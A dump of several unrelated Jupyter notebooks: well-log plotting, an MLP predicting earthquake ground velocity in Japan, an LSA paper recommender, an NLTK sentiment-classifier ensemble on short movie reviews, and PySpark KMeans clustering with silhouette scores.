plt.grid(True)
ax=plt.subplot(2,5,5)
plt.title('poisson ratio',fontsize=13)
plt.plot(pr,np.arange(pr.shape[0]))
ax.invert_yaxis()
plt.hlines(105,np.min(pr),np.max(pr),colors='r',alpha=0.6)
plt.hlines(505,np.min(pr),np.max(pr),colors='r',alpha=0.6)
plt.hlines(905,np.min(pr),np.max(pr),colors='r',alpha=0.6)
plt.hlines(1305,np.min(pr),np.max(pr),colors='r',alpha=0.6)
plt.grid(True)
ax=plt.subplot(2,5,6)
plt.title(r'$\lambda\rho - \mu\rho$',fontsize=13)
plt.plot(lambda_rho,np.arange(lambda_rho.shape[0]),label=r'$\lambda\rho$',color='darkblue')
plt.plot(mu_rho,np.arange(mu_rho.shape[0]),label=r'$\mu\rho$',color='darkgreen')
ax.invert_yaxis()
plt.legend(loc='lower left')
plt.hlines(105,np.min(mu_rho),np.max(mu_rho),colors='r',alpha=0.6)
plt.hlines(505,np.min(mu_rho),np.max(mu_rho),colors='r',alpha=0.6)
plt.hlines(905,np.min(mu_rho),np.max(mu_rho),colors='r',alpha=0.6)
plt.hlines(1305,np.min(mu_rho),np.max(mu_rho),colors='r',alpha=0.6)
plt.grid(True)
ax=plt.subplot(2,5,7)
plt.title('AI',fontsize=13)
plt.plot(ai,np.arange(ai.shape[0]),color='darkblue')
ax.invert_yaxis()
plt.hlines(105,np.min(ai),np.max(ai),colors='r',alpha=0.6)
plt.hlines(505,np.min(ai),np.max(ai),colors='r',alpha=0.6)
plt.hlines(905,np.min(ai),np.max(ai),colors='r',alpha=0.6)
plt.hlines(1305,np.min(ai),np.max(ai),colors='r',alpha=0.6)
plt.grid(True)
ax=plt.subplot(2,5,8)
plt.title('EI',fontsize=13)
plt.plot(ei,np.arange(ei.shape[0]),color='darkgreen')
ax.invert_yaxis()
plt.hlines(105,np.min(ei),np.max(ei),colors='r',alpha=0.6)
plt.hlines(505,np.min(ei),np.max(ei),colors='r',alpha=0.6)
plt.hlines(905,np.min(ei),np.max(ei),colors='r',alpha=0.6)
plt.hlines(1305,np.min(ei),np.max(ei),colors='r',alpha=0.6)
plt.grid(True)
ax=plt.subplot(2,5,9)
plt.title('NEI',fontsize=13)
plt.plot(nei,np.arange(nei.shape[0]),color='darkorange')
ax.invert_yaxis()
plt.hlines(105,np.min(nei),np.max(nei),colors='r',alpha=0.6)
plt.hlines(505,np.min(nei),np.max(nei),colors='r',alpha=0.6)
plt.hlines(905,np.min(nei),np.max(nei),colors='r',alpha=0.6)
plt.hlines(1305,np.min(nei),np.max(nei),colors='r',alpha=0.6)
plt.grid(True)
ax=plt.subplot(2,5,10)
plt.title('AI - EI - NEI',fontsize=13)
plt.plot(ai,np.arange(ai.shape[0]),label='ai',color='darkblue')
plt.plot(ei,np.arange(ei.shape[0]),label='ei',color='darkgreen')
plt.plot(nei,np.arange(nei.shape[0]),label='nei',color='darkorange')
plt.legend(loc='center left', bbox_to_anchor=(1, 0.5))
ax.invert_yaxis()
plt.hlines(105,np.min(ei),np.max(ei),colors='r',alpha=0.6)
plt.hlines(505,np.min(ei),np.max(ei),colors='r',alpha=0.6)
plt.hlines(905,np.min(ei),np.max(ei),colors='r',alpha=0.6)
plt.hlines(1305,np.min(ei),np.max(ei),colors='r',alpha=0.6)
plt.grid(True)
plt.tight_layout()
###Output
_____no_output_____
###Markdown
Crossplots
###Code
#colormap from del Monte (2015)
# 0=brine 1=gas 2=shale
ccc = ['blue','red','green']
cmap_facies = colors.ListedColormap(ccc[0:len(ccc)], 'indexed')
fig=plt.figure(figsize=(16,6))
ax=plt.subplot(2,4,1)
plt.scatter(vp,rho,20,c=faceis_vet,cmap=cmap_facies)
ax.set_xlabel('Vp (m/s)')
ax.set_ylabel('Rhob (g/cc)')
plt.grid()
cbar=plt.colorbar(pad=0)
cbar.set_label((15*' ').join(['brine', 'gas', 'shale']))
cbar.set_ticks(range(0,1)); cbar.set_ticklabels('')
ax=plt.subplot(2,4,2)
plt.scatter(vp,vs,20,c=faceis_vet,cmap=cmap_facies)
ax.set_xlabel('Vp (m/s)')
ax.set_ylabel('Vs (m/s)')
plt.grid()
cbar=plt.colorbar(pad=0)
cbar.set_label((15*' ').join(['brine', 'gas', 'shale']))
cbar.set_ticks(range(0,1)); cbar.set_ticklabels('')
ax=plt.subplot(2,4,3)
plt.scatter(vs,vpvs,20,c=faceis_vet,cmap=cmap_facies)
ax.set_xlabel('Vs (km/s)')
ax.set_ylabel('Vp/Vs')
plt.grid()
cbar=plt.colorbar(pad=0)
cbar.set_label((15*' ').join(['brine', 'gas', 'shale']))
cbar.set_ticks(range(0,1)); cbar.set_ticklabels('')
ax=plt.subplot(2,4,4)
plt.scatter(lambda_rho,mu_rho,20,c=faceis_vet,cmap=cmap_facies)
ax.set_xlabel(r'$\lambda\rho (g^2/cc^2 x m^2/s^2)$')
ax.set_ylabel(r'$\mu\rho (g^2/cc^2 x m^2/s^2)$')
plt.grid()
cbar=plt.colorbar(pad=0)
cbar.set_label((15*' ').join(['brine', 'gas', 'shale']))
cbar.set_ticks(range(0,1)); cbar.set_ticklabels('')
ax=plt.subplot(2,4,5)
plt.scatter(ai,vpvs,20,c=faceis_vet,cmap=cmap_facies)
ax.set_xlabel('AI (g/cc x m/s)')
ax.set_ylabel('Vp/Vs')
plt.grid()
cbar=plt.colorbar(pad=0)
cbar.set_label((15*' ').join(['brine', 'gas', 'shale']))
cbar.set_ticks(range(0,1)); cbar.set_ticklabels('')
ax=plt.subplot(2,4,6)
plt.scatter(nei,vpvs,20,c=faceis_vet,cmap=cmap_facies)
ax.set_xlabel('NEI (g/cc x m/s)')
ax.set_ylabel('Vp/Vs')
plt.grid()
cbar=plt.colorbar(pad=0)
cbar.set_label((15*' ').join(['brine', 'gas', 'shale']))
cbar.set_ticks(range(0,1)); cbar.set_ticklabels('')
ax=plt.subplot(2,4,7)
plt.scatter(nei,ai,20,c=faceis_vet,cmap=cmap_facies)
ax.set_xlabel('NEI (g/cc x m/s)')
ax.set_ylabel('AI (g/cc x m/s)')
plt.grid()
cbar=plt.colorbar(pad=0)
cbar.set_label((15*' ').join(['brine', 'gas', 'shale']))
cbar.set_ticks(range(0,1)); cbar.set_ticklabels('')
plt.tight_layout()
###Output
_____no_output_____ |
0neural network.ipynb | ###Markdown
kumamoto0414
###Code
kumamoto0414=pd.read_csv('kumamoto.csv')
kumamoto0414.head()
Ypgvkumamoto0414=mlp.predict(kumamoto0414)
Lkumamoto0414=kumamoto0414.iloc[:,1].values
Kpgvkumamoto0414=pd.read_csv('pgvkumamoto.csv')
plt.title('kumamoto0414')
plt.scatter(Lkumamoto0414,Kpgvkumamoto0414, color='green', label='kansoku',alpha=1)
plt.scatter(Lkumamoto0414,Ypgvkumamoto0414, color='darkorange', label='yosoku',alpha=1)
plt.xlim(10,500)
plt.xlabel('distance(km)')
plt.ylabel('pgv(cm/s)')
plt.yscale('log')
plt.xscale('log')
plt.legend()
plt.grid(True)
plt.show
print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvkumamoto0414,Ypgvkumamoto0414))
print('Mean Squared Error:', metrics.mean_squared_error(Kpgvkumamoto0414,Ypgvkumamoto0414))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvkumamoto0414, Ypgvkumamoto0414)))
from sklearn.metrics import r2_score
print('r^2 test data: ', r2_score(Kpgvkumamoto0414,Ypgvkumamoto0414))
###Output
r^2 test data: 0.17459876441454936
###Markdown
kumamoto0416
###Code
kumamoto0416=pd.read_csv('kumamoto416.csv')
kumamoto0416.head()
Ypgvkumamoto0416=mlp.predict(kumamoto0416)
Lkumamoto0416=kumamoto0416.iloc[:,1].values
Kpgvkumamoto0416=pd.read_csv('pgvkumamoto416.csv')
plt.title('kumamoto0416')
plt.scatter(Lkumamoto0416,Kpgvkumamoto0416, color='green', label='kansoku',alpha=1)
plt.scatter(Lkumamoto0416,Ypgvkumamoto0416, color='darkorange', label='yosoku',alpha=1)
plt.xlim(10,1500)
plt.xlabel('distance(km)')
plt.ylabel('pgv(cm/s)')
plt.yscale('log')
plt.xscale('log')
plt.legend()
plt.grid(True)
plt.show
print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvkumamoto0416,Ypgvkumamoto0416))
print('Mean Squared Error:', metrics.mean_squared_error(Kpgvkumamoto0416,Ypgvkumamoto0416))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvkumamoto0416, Ypgvkumamoto0416)))
###Output
Mean Absolute Error 2.996679669834763
Mean Squared Error: 49.066334748408224
Root Mean Squared Error: 7.004736593791963
###Markdown
osaka0618
###Code
osaka0618=pd.read_csv('osaka0618.csv')
osaka0618.head()
Ypgvosaka0618=mlp.predict(osaka0618)
Losaka0618=osaka0618.iloc[:,1].values
Kpgvosaka0618=pd.read_csv('pgvosaka0618.csv')
plt.title('osaka0618')
plt.scatter(Losaka0618,Kpgvosaka0618, color='green', label='kansoku',alpha=1)
plt.scatter(Losaka0618,Ypgvosaka0618, color='darkorange', label='yosoku',alpha=1)
plt.xlim(10,500)
plt.xlabel('distance(km)')
plt.ylabel('pgv(cm/s)')
plt.yscale('log')
plt.xscale('log')
plt.legend()
plt.grid(True)
plt.show
print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvosaka0618,Ypgvosaka0618))
print('Mean Squared Error:', metrics.mean_squared_error(Kpgvosaka0618,Ypgvosaka0618))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvosaka0618, Ypgvosaka0618)))
###Output
Mean Absolute Error 1.6959718992784847
Mean Squared Error: 15.254963398931798
Root Mean Squared Error: 3.9057602843661305
###Markdown
hokkaido0906
###Code
hokkaido0906=pd.read_csv('hokkaido0906.csv')
hokkaido0906.head()
Ypgvhokkaido0906=mlp.predict(hokkaido0906)
Lhokkaido0906=hokkaido0906.iloc[:,1].values
Kpgvhokkaido0906=pd.read_csv('pgvhokkaido0906.csv')
plt.title('hokkaido0906')
plt.scatter(Lhokkaido0906,Kpgvhokkaido0906, color='green', label='kansoku',alpha=1)
plt.scatter(Lhokkaido0906,Ypgvhokkaido0906, color='darkorange', label='yosoku',alpha=1)
plt.xlim(10,1000)
plt.xlabel('distance(km)')
plt.ylabel('pgv(cm/s)')
plt.yscale('log')
plt.xscale('log')
plt.legend()
plt.grid(True)
plt.show
print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvhokkaido0906,Ypgvhokkaido0906))
print('Mean Squared Error:', metrics.mean_squared_error(Kpgvhokkaido0906,Ypgvhokkaido0906))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvhokkaido0906, Ypgvhokkaido0906)))
###Output
Mean Absolute Error 3.3931648425860472
Mean Squared Error: 87.72881878979227
Root Mean Squared Error: 9.366366360002809
###Markdown
テスト100以下 hokkaido
###Code
hokkaido100=pd.read_csv('h100.csv')
Ypgvhokkaido100=mlp.predict(hokkaido100)
Lhokkaido100=hokkaido100.iloc[:,1].values
Kpgvhokkaido100=pd.read_csv('ph100.csv')
plt.title('hokkaido100')
plt.scatter(Lhokkaido100,Kpgvhokkaido100,s=13, color='green', label='kansoku',alpha=1)
plt.scatter(Lhokkaido100,Ypgvhokkaido100,s=13, color='orange', label='yosoku',alpha=1)
plt.xlim(10,100)
plt.ylim(1,300)
plt.xlabel('distance(km)')
plt.ylabel('pgv(cm/s)')
plt.yscale('log')
plt.xscale('log')
plt.legend()
plt.grid(True)
plt.show
print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvhokkaido100,Ypgvhokkaido100))
print('Mean Squared Error:', metrics.mean_squared_error(Kpgvhokkaido100,Ypgvhokkaido100))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvhokkaido100,Ypgvhokkaido100)))
###Output
Mean Absolute Error 12.430680350728197
Mean Squared Error: 555.5608575338796
Root Mean Squared Error: 23.570338511228037
###Markdown
osaka
###Code
osaka100=pd.read_csv('o100.csv')
Ypgvosaka100=mlp.predict(osaka100)
Losaka100=osaka100.iloc[:,1].values
Kpgvosaka100=pd.read_csv('po100.csv')
plt.title('osaka100')
plt.scatter(Losaka100,Kpgvosaka100,s=13, color='green', label='kansoku',alpha=1)
plt.scatter(Losaka100,Ypgvosaka100,s=13, color='orange', label='yosoku',alpha=1)
plt.xlim(10,100)
plt.ylim(1,100)
plt.xlabel('distance(km)')
plt.ylabel('pgv(cm/s)')
plt.yscale('log')
plt.xscale('log')
plt.legend()
plt.grid(True)
plt.show
print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvosaka100,Ypgvosaka100))
print('Mean Squared Error:', metrics.mean_squared_error(Kpgvosaka100,Ypgvosaka100))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvosaka100,Ypgvosaka100)))
###Output
Mean Absolute Error 4.044321723784055
Mean Squared Error: 63.70960301104061
Root Mean Squared Error: 7.981829552868228
###Markdown
kumamoto0416
###Code
kh100=pd.read_csv('kh100.csv')
Ypgvkh100=mlp.predict(kh100)
Lkh100=kh100.iloc[:,1].values
Kpgvkh100=pd.read_csv('pkh100.csv')
plt.title('kumamoto(0416)100')
plt.scatter(Lkh100,Kpgvkh100,s=13, color='green', label='kansoku',alpha=1)
plt.scatter(Lkh100,Ypgvkh100,s=13, color='orange', label='yosoku',alpha=1)
plt.xlim(10,100)
plt.ylim(1,200)
plt.xlabel('distance(km)')
plt.ylabel('pgv(cm/s)')
plt.yscale('log')
plt.xscale('log')
plt.legend()
plt.grid(True)
plt.show
print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvkh100,Ypgvkh100))
print('Mean Squared Error:', metrics.mean_squared_error(Kpgvkh100,Ypgvkh100))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvkh100,Ypgvkh100)))
###Output
Mean Absolute Error 9.254420001665043
Mean Squared Error: 249.43201457090316
Root Mean Squared Error: 15.793416811155943
###Markdown
kumamoto0414
###Code
kz100=pd.read_csv('kz100.csv')
Ypgvkz100=mlp.predict(kz100)
Lkz100=kz100.iloc[:,1].values
Kpgvkz100=pd.read_csv('pkz100.csv')
plt.title('kumamoto(0414)100')
plt.scatter(Lkz100,Kpgvkz100,s=13, color='green', label='kansoku',alpha=1)
plt.scatter(Lkz100,Ypgvkz100,s=13, color='orange', label='yosoku',alpha=1)
plt.xlim(10,100)
plt.ylim(1,200)
plt.xlabel('distance(km)')
plt.ylabel('pgv(cm/s)')
plt.yscale('log')
plt.xscale('log')
plt.legend()
plt.grid(True)
plt.show
print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvkz100,Ypgvkz100))
print('Mean Squared Error:', metrics.mean_squared_error(Kpgvkz100,Ypgvkz100))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvkz100,Ypgvkz100)))
###Output
Mean Absolute Error 6.330815098707226
Mean Squared Error: 130.0407185445954
Root Mean Squared Error: 11.40353973749359
|
notebooks/Latent_semantic_analysis.ipynb | ###Markdown
UNSUPERVISED LEARNING Recommending documents with LSA---- ❗ NLTK is hard to install. I recommend running this notebook in Google Colab instead: https://drive.google.com/file/d/1xel4VmTqzFoZkOiEijyGhYuH6BQW5lYM/view?usp=sharing----We'd like to find documents with similar content to a document we like, but without having to rely on tagging or other labels. This is what **latent semantic analysis** is for. We can 'sense' the meaning of a document from the words it contains.Inspired by and/or based on [**science concierge**](https://github.com/titipata/science_concierge) and [**Chris Clark's repo**](https://github.com/groveco/content-engine) on content-based recommendation.[This blog post](https://www.themarketingtechnologist.co/a-recommendation-system-for-blogs-content-based-similarity-part-2/) is also really good. [Pysuggest](https://pypi.python.org/pypi/pysuggest) might be worth looking at, and so might [Crab](https://muricoca.github.io/crab/).Believe it or not, we can do all of it in about 10 lines of code!----We'll start with some data:
###Code
import pandas as pd
df = pd.read_csv('https://raw.githubusercontent.com/seg/2017-tle-hall/master/data/title_abstract_doi.csv')
df.head()
###Output
_____no_output_____
###Markdown
Prepare the data
###Code
from nltk.stem.porter import PorterStemmer
from nltk.tokenize import RegexpTokenizer
# Instantiate the stemmer and tokenizer.
stemmer, tokenizer = PorterStemmer(), RegexpTokenizer(r'\w+')
# Make a function to preprocess each item in the data.
def preprocess(item): # 3
return ' '.join(stemmer.stem(token) for token in tokenizer.tokenize(item))
# Apply the preprocessing.
data = [preprocess(item) for item in df.abstract]
###Output
_____no_output_____
###Markdown
Compute the document matrixThe matrix is a **term frequency, inverse document frequency** or "tfidf" matrix. This counts how many times words and/or phrases ('terms') appear in a document, then scales those frequencies to the inverse of how frequent they are in the cohort. So a rare word like 'coulomb' carries more weight than a common one like 'seismic'.The `sklearn` implementation automatically filters 'stop' words, eliminating things like 'the' or 'this'. It works just like `sklearn`'s other models:
###Code
from sklearn.feature_extraction.text import TfidfVectorizer
tfidf = TfidfVectorizer(stop_words='english', ngram_range=(1,1))
vecs = tfidf.fit_transform(data)
###Output
_____no_output_____
###Markdown
The resulting matrix has one row for each document, and one colun for each 'term'. If we include n-grams, which are groups of words, the matrix will be very large.
###Code
vecs.shape
###Output
_____no_output_____
###Markdown
Reduce the number of dimensionsTo make the matrix more manageable, we can reduce the number of dimensions with singular value decomposition. We'll reduce it down to 100 dimensions.
###Code
from sklearn.decomposition import TruncatedSVD
svd = TruncatedSVD(n_components=100).fit_transform(vecs)
###Output
_____no_output_____
###Markdown
Build and store the distance treeThe distance tree is a fast dta structure for finding nearest neighbours in a high-dimensional space.
###Code
from sklearn.neighbors import KDTree
tree = KDTree(svd)
###Output
_____no_output_____
###Markdown
Query the tree for recommendationsNow we can find a paper we're interested in and try to find similar papers.
###Code
target = 333
df.title[target]
# Recommend 5 docs for a single document.
_, idx = tree.query([svd[target]], k=6)
[df.title[i] for i in idx[0] if i != target]
###Output
_____no_output_____ |
wei/p18.ipynb | ###Markdown
p.18 Better Training Data
###Code
from IPython.display import YouTubeVideo
YouTubeVideo('UF-RyxOAHQw')
###Output
_____no_output_____
###Markdown
1. A new datasetMuch shorter movie reviews at https://pythonprogramming.net/static/downloads/short_reviews/. 2. Example
###Code
import nltk
import random
import string
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.classify.scikitlearn import SklearnClassifier
import pickle
from sklearn.naive_bayes import MultinomialNB, GaussianNB, BernoulliNB
from sklearn.linear_model import LogisticRegression, SGDClassifier
from sklearn.svm import SVC, LinearSVC, NuSVC
from nltk.classify import ClassifierI
from statistics import mode
class VoteClassifier(ClassifierI):
def __init__(self, *classifiers):
self._classifiers = classifiers
def classify(self, features):
votes = []
for c in self._classifiers:
v = c.classify(features)
votes.append(v)
return mode(votes)
def confidence(self, features):
votes = []
for c in self._classifiers:
v = c.classify(features)
votes.append(v)
choice_votes = votes.count(mode(votes))
conf = choice_votes/len(votes)
return conf
# If you see the "UnicodeDecodeError", add the options "encoding='utf-8', errors='replace'".
short_pos = open("short_reviews/positive.txt", "r", encoding='utf-8', errors='replace').read()
short_neg = open("short_reviews/negative.txt", "r", encoding='utf-8', errors='replace').read()
documents = []
# Note that each entry of documents is a short review, not a single word from the short review.
for r in short_pos.split('\n'):
documents.append((r, "pos"))
for r in short_neg.split('\n'):
documents.append((r, "neg"))
all_words = []
short_pos_words = word_tokenize(short_pos)
short_neg_words = word_tokenize(short_neg)
# Remove the stop words and the punctuations.
stop_words = set(stopwords.words("english"))
stop_words = stop_words.union(set(string.punctuation))
#print("stop_words:\n", stop_words)
for w in short_pos_words:
if w.lower() not in stop_words:
all_words.append(w.lower())
for w in short_neg_words:
if w.lower() not in stop_words:
all_words.append(w.lower())
all_words = nltk.FreqDist(all_words)
# Restrict our 'features' to the most common 5000 words.
word_features = all_words.most_common(5000)
word_features = [wf[0] for wf in word_features]
# Check if each of the most common 5000 words is present in one movie review.
# The input document is a short review.
def find_features(document):
words = word_tokenize(document)
features = {}
for w in word_features:
features[w] = (w in words)
return features
# print((find_features(movie_reviews.words('neg/cv000_29416.txt'))))
# Label the 'features' in all the movie reviews.
featuresets = [(find_features(rev), category) for (rev, category) in documents]
random.shuffle(featuresets)
# Partition the entire data set into training set and test set.
training_set = featuresets[:10000]
testing_set = featuresets[10000:]
##
## Trained naive Bayes classifier
##
# Don't load this naive Bayes classfier which was trained for the long movie reviews.
#classifier_f = open("naivebayes.pickle", "rb")
#classifier = pickle.load(classifier_f)
#classifier_f.close()
#print("Naive Bayes Algo accuracy percent:", (nltk.classify.accuracy(classifier, testing_set))*100)
#classifier.show_most_informative_features(15)
##
## Scikit-Learn MultinomialNB
##
MultinomialNB_classifier = SklearnClassifier(MultinomialNB())
MultinomialNB_classifier.train(training_set)
print("MNB_classifier accuracy percent:", (nltk.classify.accuracy(MultinomialNB_classifier, testing_set))*100)
##
## Scikit-Learn GaussianNB
##
# GaussianNB_classifier = SklearnClassifier(GaussianNB())
# GaussianNB_classifier.train(training_set)
# print("GaussianNB_classifier accuracy percent:", (nltk.classify.accuracy(GaussianNB_classifier, testing_set))*100)
##
## Scikit-Learn BernoulliNB
##
BernoulliNB_classifier = SklearnClassifier(BernoulliNB())
BernoulliNB_classifier.train(training_set)
print("BernoulliNB_classifier accuracy percent:", (nltk.classify.accuracy(BernoulliNB_classifier, testing_set))*100)
##
## Scikit-Learn LogisticRegression
##
LogisticRegression_classifier = SklearnClassifier(LogisticRegression())
LogisticRegression_classifier.train(training_set)
print("LogisticRegression_classifier accuracy percent:", (nltk.classify.accuracy(LogisticRegression_classifier, testing_set))*100)
##
## Scikit-Learn SGDClassifier
##
SGDClassifier_classifier = SklearnClassifier(SGDClassifier())
SGDClassifier_classifier.train(training_set)
print("SGDClassifier_classifier accuracy percent:", (nltk.classify.accuracy(SGDClassifier_classifier, testing_set))*100)
##
## Scikit-Learn SVC
##
# The performance of the classic SVC is poor, so it is NOT used.
#SVC_classifier = SklearnClassifier(SVC())
#SVC_classifier.train(training_set)
#print("SVC_classifier accuracy percent:", (nltk.classify.accuracy(SVC_classifier, testing_set))*100)
##
## Scikit-Learn LinearSVC
##
LinearSVC_classifier = SklearnClassifier(LinearSVC())
LinearSVC_classifier.train(training_set)
print("LinearSVC_classifier accuracy percent:", (nltk.classify.accuracy(LinearSVC_classifier, testing_set))*100)
##
## Scikit-Learn NuSVC
##
NuSVC_classifier = SklearnClassifier(NuSVC())
NuSVC_classifier.train(training_set)
print("NuSVC_classifier accuracy percent:", (nltk.classify.accuracy(NuSVC_classifier, testing_set))*100)
voted_classifier = VoteClassifier(#classifier,
MultinomialNB_classifier,
BernoulliNB_classifier,
LogisticRegression_classifier,
#SGDClassifier_classifier,
LinearSVC_classifier,
NuSVC_classifier)
print("voted_classifier accuracy percent:", (nltk.classify.accuracy(voted_classifier, testing_set))*100)
# print("Classification: ", voted_classifier.classify(testing_set[0][0]),
# "Confidence %: ", voted_classifier.confidence(testing_set[0][0])*100)
# print("Classification: ", voted_classifier.classify(testing_set[1][0]),
# "Confidence %: ", voted_classifier.confidence(testing_set[1][0])*100)
# print("Classification: ", voted_classifier.classify(testing_set[2][0]),
# "Confidence %: ", voted_classifier.confidence(testing_set[2][0])*100)
# print("Classification: ", voted_classifier.classify(testing_set[3][0]),
# "Confidence %: ", voted_classifier.confidence(testing_set[3][0])*100)
# print("Classification: ", voted_classifier.classify(testing_set[4][0]),
# "Confidence %: ", voted_classifier.confidence(testing_set[4][0])*100)
# print("Classification: ", voted_classifier.classify(testing_set[5][0]),
# "Confidence %: ", voted_classifier.confidence(testing_set[5][0])*100)
###Output
MNB_classifier accuracy percent: 81.47590361445783
BernoulliNB_classifier accuracy percent: 80.87349397590361
LogisticRegression_classifier accuracy percent: 80.12048192771084
|
docs/Seagate Project/Seagate_Project.ipynb | ###Markdown
K Means
###Code
from pyspark.ml.clustering import KMeans
from pyspark.ml.evaluation import ClusteringEvaluator
silhouette_score2=[]
evaluator = ClusteringEvaluator(predictionCol='prediction', featuresCol='features', metricName='silhouette', distanceMeasure='squaredEuclidean')
for i in range(2,20):
KMeans_algo=KMeans(featuresCol='features', k=i)
KMeans_fit=KMeans_algo.fit(df_v)
output=KMeans_fit.transform(df_v)
score=evaluator.evaluate(output)
silhouette_score2.append(score)
print("Silhouette Score:",score)
fig, ax = plt.subplots(1,1, figsize =(8,6))
ax.plot(range(2,20),silhouette_score2)
ax.set_xlabel('k')
ax.set_ylabel('cost')
df_ss = df_ss.withColumn("idx", fn.monotonically_increasing_id())
from pyspark.ml.clustering import KMeans
from pyspark.ml.evaluation import ClusteringEvaluator
evaluator = ClusteringEvaluator(predictionCol='prediction', featuresCol='scaled_features', metricName='silhouette', distanceMeasure='squaredEuclidean')
k = 2
kmeans = KMeans().setK(k).setSeed(1).setFeaturesCol("scaled_features")
model = kmeans.fit(df_ss)
centers = model.clusterCenters()
print("Cluster Centers: ")
for center in centers:
print(center)
predictions = model.transform(df_ss)
silhouette = evaluator.evaluate(predictions)
print("Silhouette with squared euclidean distance = " + str(silhouette))
print("Cluster Centers: ")
ctr=[]
centers = model.clusterCenters()
for center in centers:
ctr.append(center)
###Output
Silhouette with squared euclidean distance = 0.17330592905654787
Cluster Centers:
[-1.10568157e-02 1.34843725e-02 -1.04165171e-02 -1.07746528e-02
-1.82602199e-02 -5.35942898e-03 -1.59187558e-02 -1.92205419e-03
-3.21163442e-03 -1.70558380e-02 -8.81915530e-03 -6.46422412e-02
2.19091126e-02 -6.63283877e-02 3.55648284e-03 -1.23584312e-02
1.49290632e-03 -7.66098439e-03 6.68002717e-04 -1.11116874e-02
7.54137867e-04 1.98849887e-02 1.59907224e-02 -1.09136177e-02
-9.60715084e-03 -6.06493694e-02 -4.61885312e-02 -4.44842920e-02
-3.98679304e-03 -1.37413704e-02 9.15865457e-03 7.60859348e-03
-3.74162031e-02 -2.39044254e-02 8.40289097e-03 -4.16010105e-02
3.70695648e-02 1.10310233e-02 2.19313502e-02 1.77222300e-02
5.36477363e-02 -5.45637179e-02 7.87159762e-03 2.90631725e-04
-4.19009058e-01 -4.59656757e-03 4.19077903e-01 -7.54482487e-02
7.54482487e-02 2.40856690e-03 3.60244610e-03 -7.50485651e-02
7.48556008e-02 -1.17053363e-03 1.70113831e-02 1.33078735e-02
-7.71346423e-02 1.59010531e-01 -9.46546529e-02 -7.80095966e-02
8.50552162e-02 -8.50552162e-02 3.74939351e-02 2.50487766e-01
-3.36164382e-01 -1.31308431e-02 3.28869333e-03 1.05387308e-02
2.20105433e-03 1.11732540e-02 7.56609515e-03 -8.09948540e-04
-2.11786570e-03 -4.38592868e-02 2.78227936e-03 5.41773431e-03
3.27517648e-03 4.11810283e-03 -1.98147911e-03 2.83417694e-03
-5.16867116e-03 -1.14333043e-01 -5.69603035e-02 -6.87829857e-02
-6.17918061e-02 1.34407382e-01 -1.41018271e-01 3.70226779e-01
-2.44944142e-01 -2.15179912e-01 8.12204932e-03 6.97542646e-03
-2.79953174e-02 2.22467261e-02 2.48139751e-02 3.29965674e-02
-1.33523132e-01 9.20129789e-02 -6.66564860e-03 -5.24975561e-03
-1.60558163e-02 1.52833106e-01 -7.30094880e-02 -6.69709784e-03
-1.31171924e-01 3.06982277e-03 8.46501453e-03 1.65428156e-01
-5.32459648e-02 -6.64559195e-03 -1.69188955e-01 -8.65720313e-02
-2.08733285e-02 8.62520213e-02 -3.52431367e-05 8.95333791e-02
-2.12298653e-02 -8.00797023e-02 -8.10280748e-03 -3.25379090e-04
-2.58043674e-02 -5.92491508e-01 -6.10100977e-03 5.92554985e-01]
[ 3.04314511e-02 -3.71127668e-02 2.86691700e-02 2.96548598e-02
5.02572353e-02 1.47506484e-02 4.38128707e-02 5.29003102e-03
8.83931670e-03 4.69424392e-02 2.42727834e-02 1.77913538e-01
-6.03000091e-02 1.82554285e-01 -9.78843606e-03 3.40138612e-02
-4.10889597e-03 2.10851730e-02 -1.83853042e-03 3.05824734e-02
-2.07559845e-03 -5.47290537e-02 -4.40109431e-02 3.00373301e-02
2.64415676e-02 1.66924037e-01 1.27123764e-01 1.22433220e-01
1.09727701e-02 3.78200967e-02 -2.52071804e-02 -2.09409785e-02
1.02979862e-01 6.57916683e-02 -2.31271075e-02 1.14497623e-01
-1.02025816e-01 -3.03604630e-02 -6.03612131e-02 -4.87765364e-02
-1.47653584e-01 1.50174621e-01 -2.16648395e-02 -7.99899840e-04
1.15323019e+00 1.26510403e-02 -1.15341967e+00 2.07654694e-01
-2.07654694e-01 -6.62905013e-03 -9.91493980e-03 2.06554653e-01
-2.06023562e-01 3.22163613e-03 -4.68200870e-02 -3.66269920e-02
2.12296122e-01 -4.37641479e-01 2.60516094e-01 2.14704241e-01
-2.34095757e-01 2.34095757e-01 -1.03193802e-01 -6.89412431e-01
9.25218454e-01 3.61397547e-02 -9.05140436e-03 -2.90055364e-02
-6.05791748e-03 -3.07519219e-02 -2.08240112e-02 2.22920504e-03
5.82895908e-03 1.20713031e-01 -7.65761141e-03 -1.49111210e-02
-9.01420222e-03 -1.13341714e-02 5.45358504e-03 -7.80044807e-03
1.42256295e-02 3.14676529e-01 1.56770695e-01 1.89310025e-01
1.70068343e-01 -3.69926729e-01 3.88121745e-01 -1.01896770e+00
6.74154825e-01 5.92235335e-01 -2.23541527e-02 -1.91983257e-02
7.70509479e-02 -6.12292159e-02 -6.82950035e-02 -9.08157874e-02
3.67493025e-01 -2.53245467e-01 1.83457303e-02 1.44487966e-02
4.41900997e-02 -4.20639478e-01 2.00942542e-01 1.84322874e-02
3.61021843e-01 -8.44901134e-03 -2.32980889e-02 -4.55304579e-01
1.46547796e-01 1.82905288e-02 4.65655350e-01 2.38270457e-01
5.74492413e-02 -2.37389700e-01 9.69989748e-05 -2.46420915e-01
5.84305304e-02 2.20401751e-01 2.23011937e-02 8.95534312e-04
7.10208402e-02 1.63070244e+00 1.67916862e-02 -1.63087714e+00]
